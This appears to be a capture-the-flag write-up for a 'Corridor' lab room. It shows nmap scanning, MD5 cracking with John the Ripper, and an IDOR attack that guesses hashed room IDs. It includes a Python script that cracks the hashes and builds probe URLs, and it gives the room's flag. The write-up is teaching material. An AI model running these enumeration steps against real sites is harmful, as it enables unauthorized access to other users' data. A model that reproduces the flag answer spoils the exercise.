Can you escape the Corridor?
Scan the target:
nmap -sS -sV 10.10.225.145
Going to the web page, we see a corridor with a lot of doors that can be opened.
Viewing the source, I can see that each door links to a hash value.
Now I will collect all of these hashes for further research:
curl http://10.10.225.145 | grep 'alt' | cut -d '"' -f4 > hash.txt
Crack the hashes with John the Ripper:
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
All of the hashed URL endpoints turn out to be the MD5 of the numbers 1 to 13, so each door is just a sequential room number hidden behind a hash.
That is a classic IDOR setup: the hash is not a secret, only an encoding of a predictable ID, so I will change the hashed URL to a value outside the visible range, for example 14 or 0:
echo -n 14 | md5sum
echo -n 0 | md5sum
There is nothing at room 14, but there is a flag at room 0.
Here you are:
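The whole probe can be scripted instead of done by hand. The following Python is an added example written for this writeup, not code from the room or from the original post: it pulls the hashes out of the page, matches them against MD5(n) for a range of integers (the same thing John was doing with rockyou, but exhaustive for small numbers), and then lists the IDs an IDOR probe should try: any gap inside the observed range plus one past each end. The sample HTML is constructed here to stand in for the real page, and the assumption that the hash sits in the `alt` attribute comes from the `grep 'alt'` step above; the target host is the one used on this page.

```python
import hashlib
import re
import urllib.request


def md5_hex(s: str) -> str:
    """MD5 of a string, lowercase hex, matching `echo -n <s> | md5sum`."""
    return hashlib.md5(s.encode()).hexdigest()


# Constructed stand-in for the corridor page: 13 doors, each linking to the MD5
# of its room number (same shape the real page has, but not its actual HTML).
SAMPLE_HTML = "\n".join(
    f'<a href="{md5_hex(str(i))}"><img src="door.png" alt="{md5_hex(str(i))}"></a>'
    for i in range(1, 14)
)

HASH_RE = re.compile(r'alt="([0-9a-f]{32})"')


def extract_hashes(html: str) -> list[str]:
    """Collect the unique 32-hex-char values carried in alt attributes."""
    return sorted(set(HASH_RE.findall(html)))


def crack_numeric(hashes: list[str], lo: int = 0, hi: int = 100000) -> dict[str, int]:
    """Map each hash to the integer n in [lo, hi] with MD5(str(n)) == hash."""
    table = {md5_hex(str(n)): n for n in range(lo, hi + 1)}
    return {h: table[h] for h in hashes if h in table}


def candidate_ids(ids: list[int]) -> list[int]:
    """IDs worth probing: gaps inside the observed range, plus one past each end."""
    present = set(ids)
    lo, hi = min(present), max(present)
    cands = [lo - 1] + [n for n in range(lo, hi + 1) if n not in present] + [hi + 1]
    return [n for n in cands if n >= 0]


def probe_urls(base: str, ids: list[int]) -> list[str]:
    """Build the hashed URL for each candidate room number."""
    return [f"{base.rstrip('/')}/{md5_hex(str(n))}" for n in ids]


def fetch(url: str) -> tuple[int, str]:
    """GET a URL and return (status, body); only used when run against a live target."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, ""


if __name__ == "__main__":
    base = "http://10.10.225.145"
    # Against the real target you would replace SAMPLE_HTML with fetch(base)[1].
    cracked = crack_numeric(extract_hashes(SAMPLE_HTML))
    ids = sorted(cracked.values())
    print("rooms seen:", ids)
    for url in probe_urls(base, candidate_ids(ids)):
        print("probe:", url)
        # status, body = fetch(url)  # uncomment when the room is running
```

Running it against the live room prints one URL per candidate; room 0 is the one that answers with the flag, exactly as found by hand above.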
| Flag | Corridor |
|---|---|
| Answer | flag{2477ef02448ad9156661ac40a6b8862e} |